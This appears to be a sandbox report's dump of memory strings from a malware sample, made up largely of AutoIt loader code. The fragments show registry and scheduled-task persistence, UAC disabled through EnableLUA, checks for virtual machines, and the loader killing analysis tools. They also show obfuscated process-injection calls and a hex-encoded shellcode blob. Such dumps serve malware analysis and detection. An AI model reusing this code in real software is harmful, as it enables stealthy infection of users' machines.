Source: sdadbtvsh.bin, 00000008.00000003.1554858554.0000000001857000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8___f3c3f786d6c2076657273696f6e3d223/2e302220656e636f64696e673d225554462d38222073746/6e646/6c6f6e653d22796573223f3e0d03c6/7373656d626c7920786d6c6e733d2275726e3736368656d6/732d6d6963726f736f66742d636f6d36/736d2e763/22206d6/6e696665737456657273696f6e3d223/2e30223e0d020203c6/7373656d626c794964656e746974792076657273696f6e3d223/2e302e302e3022206e6/6d653d224d794/70706c69636/74696f6e2e6/7070222f3e0d020203c7472757374496e666f20786d6c6e733d2275726e3736368656d6/732d6d6963726f736f66742d636f6d36/736d2e7632223e0d0202020203c73656375726974793e0d02020202020203c72657/75657374656450726976696c6567657320786d6c6e733d2275726e3736368656d6/732d6d6963726f736f66742d636f6d36/736d2e7633223e0d020202020202020203c72657/756573746564457865637574696f6e4c6576656c206c6576656c3d226/73496e766f6_6572222075694/63636573733d22666/6c7365222f3e0d02020202020203c2f72657/75657374656450726976696c656765733e0d0202020203c2f73656375726974793e0d020203c2f7472757374496e666f3e0d03c2f6/7373656d626c793e0d0*	memstr_0ef2abaa-0
Source: sdadbtvsh.bin, 00000008.00000003.1542791644.00000000015B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \registry\machine\software\wow6432node\microsoft\windows\currentversion\run\registry\machine\software\wow6432node\microsoft\windows\currentversion\runh	memstr_857d6f2b-d
Source: sdadbtvsh.bin, 00000008.00000003.1542791644.00000000015B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: y\machine\software\microsoft\windows\currentversion\run	memstr_6744e2c5-1
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntversion\run", $key_vbsloader, "reg_sz", filegetshortname($dir3ctory_path & '\' & "update.vbs"))	memstr_0d84108b-b
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: regwrite("hkcu64\software\microsoft\windows\currentversion\run", $key_vbsloader, "reg_sz", filegetshortname($dir3ctory_path & '\' & "update.vbs"))2	memstr_f52c04a3-e
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc	memstr_c10617ab-8
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif47	memstr_c9cbbba2-f
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: exitqk3	memstr_3e7068a9-b
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: exit3a1	memstr_49572409-f
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif4t	memstr_67e493fe-6
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc<	memstr_9296181f-6
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif	memstr_fb3860c1-a
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: exitfv9	memstr_55cc2b71-c
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif!	memstr_2c31b9a1-2
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif$h	memstr_e4f339b3-0
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endifqpq	memstr_f4491f02-b
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: elsec	memstr_52429308-b
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: exit048z	memstr_18ac213e-3
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif4z	memstr_1020c105-5
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endifr	memstr_174e3a32-e
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @comspec & ' /c ' & "schtasks /create /sc minute /mo 30 /tn " & $taskname & " /tr" & ' "' & filegetshortname($dir3ctory_path & "\" & $exec) & " " & filegetshortname($dir3ctory_path & "\" & $auex) & '"', "", @sw_hide)	memstr_8d54621e-0
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: regwrite("hklm64\software\microsoft\windows\currentversion\policies\system", "enablelua", "reg_dword", "0")	memstr_44f006be-e
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if processexists("vboxservice.exe") then2ji	memstr_5eea811a-3
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if drivespacefree("d:\") < 1 and processexists("vmwareuser.exe") then	memstr_1b8b0259-3
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if drivespacefree("d:\") < 1 and processexists("vmwareservice.exe") theng4	memstr_55e08284-1
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $startupkey = iniread($settingsfn, $ini_settings, "key", '').v	memstr_1f510b0d-8
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return seterror(11, 0, 0)hku	memstr_3a2c2218-b
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return seterror(10, 0, 0)	memstr_1606ee7f-3
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return seterror(9, 0, 0)p0	memstr_93aa6083-8
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return seterror(7, 0, 0)q	memstr_4cf25955-d
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return seterror(8, 0, 0)	memstr_0f4aa0b9-b
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $binary = "" then exit4uu	memstr_a78e2066-c
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processclose("mshta.exe")e	memstr_565e2a51-6
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return $inject_net4_regsvc	memstr_cc47f09e-4
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return $inject_net2_regasm7]	memstr_736e9aad-1
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return seterror(2, 0, 0)	memstr_ae8c008e-0
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $short = "start.lnk"	memstr_4af1ec03-5
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processclose("regshot.exe")	memstr_b260c18d-c
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $irunflag, $tcontext<	memstr_abc9e610-7
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return seterror(6, 0, 0)	memstr_d67318c4-d
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return $inject_net2_regsvc	memstr_9ed801e5-0
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func denario($var92 = "-1")	memstr_02cd08e8-6
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if not $frelocatable then	memstr_966ff3db-e
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $context_full = 0x100007$	memstr_fca93851-0
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return seterror(101, 1, 0)2	memstr_2789c223-3
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $script = "start.vbs"	memstr_e1e24ab3-2
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return seterror(101, 0, 0)l	memstr_5092e576-d
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processclose("taskmgr.exe")	memstr_0daf4a7d-0
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func mainpe($executename)	memstr_d8a50cab-a
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processclose("procexp.exe")	memstr_e42f5b83-8
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: winclose("process hacker")9-	memstr_cf194dd0-f
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return seterror(3, 0, 0)2s3%	memstr_cd6fb333-8
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return seterror(5, 0, 0)	memstr_c2d7a7d6-1
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9l%}5	memstr_fbb9d4c2-b
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return $inject_tw_u_nk_329l%}5	memstr_fcbb7977-b
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if winexists("tcpeye") then	memstr_eeb8ca5e-2
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return seterror(4, 0, 0)	memstr_5332d881-9
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return seterror(102, 0, 0)	memstr_9deda46f-3
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: elseif $imagic = 523 thenqx	memstr_56600da4-2
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processclose("taskmgr.exe")m	memstr_edfe7f0f-1
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return $inject_net4_regasm	memstr_5535a6dc-d
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processclose("tcpeye.exe")y265yd95l6246	memstr_3db71ab8-8
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rtup1 = regread("hkcu64\software\microsoft\windows\currentversion\runonce", $startupkey)l	memstr_e82319ee-d
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $startup1 = $install_path & "\" & $install_fo	memstr_990f6241-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_allocateexespaceataddress($handlerpro, $paddress, $isize)+	memstr_5412128e-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $acall = dllcall("kernel32.dll", "ptr", "virt"&"uala"&"llo"&"cex", "handle", $handlerpro, "ptr", $paddress, "dword_ptr", $isize, "dword", 0x1000, "dword", 64))	memstr_d9688e74-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $acall = dllcall("kernel32.dll", "ptr", "vi"&"rtualal"&"loc"&"ex", "handle", $handlerpro, "ptr", $paddress, "dword_ptr", $isize, "dword", 0x3000, "dword", 64))	memstr_a735e083-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $acall = dllcall("kernel32.dll", "ptr", "vir"&"tua"&"lalloc"&"ex", "handle", $handlerpro, "ptr", 0, "dword_ptr", $isize, "dword", 0x3000, "dword", 64)	memstr_d8744225-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcall("ntdll.dll", "int", "n"&"tunm"&"apviewo"&"fsection", "ptr", $handlerpro, "ptr", $paddress)	memstr_d2aa3485-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $acall = dllcall("kernel32.dll", "bool", "iswow"&"64pr"&"oce"&"ss", "handle", $handlerpro, "bool*", 0)	memstr_c0711567-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $binbuffer = dllstructcreate("byte[" & binarylen($binary) & "]")/	memstr_ae777ec9-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $ret = dllcall("user32.dll", "int", "callwi" & "ndowprocw", "ptr", dllstructgetptr($bufferasm), "ws" & "tr", $sexemodule, "ptr", dllstructgetptr($binbuffer), "int", 0, "int", 0)w	memstr_393d9395-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $ssssss = "/x6/e84e//////6b//65//72//6e//65//6c//33//32//////6e//74//64//6c//6c//////////////////////////////////////////////////////////////////////////////////////////////////////5b8bfc6a42e8bb/3////8b54242889118b54242c6a3ee8aa/3////89116a4ae8a1/3////89396a1e6a3ce89d/3////6a2268f4//////e891/3////6a266a24e888/3////6a2a6a4/e87f/3////"u	memstr_04bc1b7e-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "6a2e6a/ce876/3////6a3268c8//////e86a/3////6a2ae85c/3////8b/9c7/144//////6a12e84d/3////685be814cf51e879/3////6a3ee83b/3////8bd16a1ee832/3////6a4/ff32ff31ffd/6a12e823/3////685be814cf51e84f/3////6a1ee811/3////8b/98b513c6a3ee8/5/3////8b39/3fa6a22e8fa/2////8b/968f8//////5751ffd/6a//e8e8/2////6888feb31651e814/3////6a2ee8d6/2//"u	memstr_acb16668-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "//8b396a2ae8cd/2////8b116a42e8c4/2////57526a//6a//6a/46a//6a//6a//6a//ff31ffd/6a12e8a9/2////68d/371/f251e8d5/2////6a22e897/2////8b116a2ee88e/2////8b/9ff7234ff31ffd/6a//e87e/2////689c951a6e51e8aa/2////6a22e86c/2////8b118b396a2ee861/2////8b/96a4/68//3/////ff725/ff7734ff31ffd/6a36e847/2////8bd16a22e83e/2////8b396a3ee835/2//"u	memstr_70936b45-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "//8b316a22e82c/2////8b/16a2ee823/2////8b/952ff775456ff7/34ff316a//e81//2////68a16a3dd851e83c/2////83c4/cffd/6a12e8f9/1////685be814cf51e825/2////6a22e8e7/1////8b1183c2/66a3ae8db/1////6a/25251ffd/6a36e8ce/1////c7/1////////b828//////6a36e8bc/1////f7216a1ee8b3/1////8b118b523c81c2f8///////3d/6a3ee89f/1/////3116a26e896/1////6a"u	memstr_0f052803-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "2852ff316a12e88a/1////685be814cf51e8b6/1////83c4/cffd/6a26e873/1////8b398b/98b71146a3ee865/1/////3316a26e85c/1////8b/98b51/c6a22e85//1////8b/9/351346a46e844/1////8bc16a2ee83b/1////8b/95/ff771/5652ff316a//e82a/1////68a16a3dd851e856/1////83c4/cffd/6a36e813/1////8b1183c2/189116a3ae8/5/1////8b/93bca/f8533ffffff6a32e8f4//////"u	memstr_ec97cf0e-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "8b/9c7/1/7///1//6a//e8e5//////68d2c7a76851e811/1////6a32e8d3//////8b116a2ee8ca//////8b/952ff71/4ffd/6a22e8bb//////8b3983c7346a32e8af//////8b318bb6a4//////83c6/86a2ee89d//////8b116a46e894//////516a/45756ff326a//e886//////68a16a3dd851e8b2//////83c4/cffd/6a22e86f//////8b/98b5128/351346a32e86///////8b/981c1b///////89116a//e8"u	memstr_02b788e9-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "4f//////68d3c7a7e851e87b//////6a32e83d//////8bd16a2ee834//////8b/9ff32ff71/4ffd/6a//e824//////68883f4a9e51e85///////6a2ee812//////8b/9ff71/4ffd/6a4ae8/4//////8b2161c38bcb/34c24/4c36a//e8f2ffffff6854caaf9151e81e//////6a4/68//1/////ff7424186a//ffd/ff742414e8cfffffff89/183c41/c3e822//////68a44e/eec5/e84b//////83c4/8ff7424/4"u	memstr_e6e021f4-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "ffd/ff7424/85/e838//////83c4/8c355525153565733c/648b7/3/8b76/c8b761c8b6e/88b7e2/8b3638471875f38/3f6b74/78/3f4b74/2ebe78bc55f5e5b595a5dc35552515356578b6c241c85ed74438b453c8b542878/3d58b4a188b5a2//3dde33/498b348b/3f533ff33c/fcac84c/74/7c1cf/d/3f8ebf43b7c242/75e18b5a24/3dd668b/c4b8b5a1c/3dd8b/48b/3c55f5e5b595a5dc3c3////////"	memstr_80a1a5f6-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @<xbo	memstr_7e826959-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: g%(ao	memstr_722a9c72-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r332o	memstr_c5312abf-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: h)hao	memstr_d6bad6e1-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s3tt!ng	memstr_313da493-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: leh-t"]m	memstr_739ca6c7-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: stpthso	memstr_5aa47df9-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: g#hao	memstr_3a7fa0fa-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: h+>]y	memstr_1d22cd0a-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: g#xbo	memstr_469dcfc3-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: reg_szy]	memstr_83f1576d-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: auex*^t	memstr_8e7ecb4f-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: exec8^f	memstr_6726a6b5-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: h/b^,	memstr_1d5a3fd7-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m'a^/	memstr_7cb3e771-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6j^4	memstr_c1f2985f-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6yh$o	memstr_19d47174-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eh#o	memstr_20e766f4-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @ax$o	memstr_0fbbbf1d-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: exec//_i	memstr_3b8edabb-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: h.$_b	memstr_d5a05f94-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6(x#o	memstr_39822b86-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 3!m_+	memstr_fc8eb4e0-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \.x#o	memstr_a6faf1f3-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: exe_ct	memstr_f4dbe14e-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m.9xg	memstr_248af7d0-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 646xp	memstr_2f46ac43-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 25xs	memstr_5fcd210c-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: e($o	memstr_ac25c2cc-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @#lx*	memstr_48738718-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \.qx?	memstr_a6eea226-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: reg_szo	memstr_07d9be22-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: reg_sz	memstr_2dbd3589-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: auex*yt	memstr_b09a04f9-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vbldr	memstr_5dbaa3ab-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6zoy)	memstr_be270eca-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 3udy"	memstr_366993c8-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6npy>	memstr_02afe547-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gtjy4	memstr_923897fd-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dir3ctory_path	memstr_0210a800-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: program manager	memstr_403109b7-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: comspec	memstr_1b9da727-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: read_uac	memstr_09092b70-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vboxservice.exe&zo	memstr_d68d4b90-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run	memstr_3a315f3f-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hkey_current_user\software\microsoft\windows\currentversion\runhz	memstr_071cd9ea-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hkcu64\software\microsoft\windows\currentversion\runwz0	memstr_0a40273a-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: scriptdirrz	memstr_6e6f90be-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vbsloaderset	memstr_2c1a5e53-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: key_vbsloader	memstr_fc9fc995-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmcessexists0[}	memstr_fdd64b68-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: auexin	memstr_a1f3b784-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vbox.exeistsz[#	memstr_6cb5726e-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\runa[	memstr_4def25f1-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: taskname	memstr_a6c5a93c-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: meomrypersistance	memstr_b39088a7-5
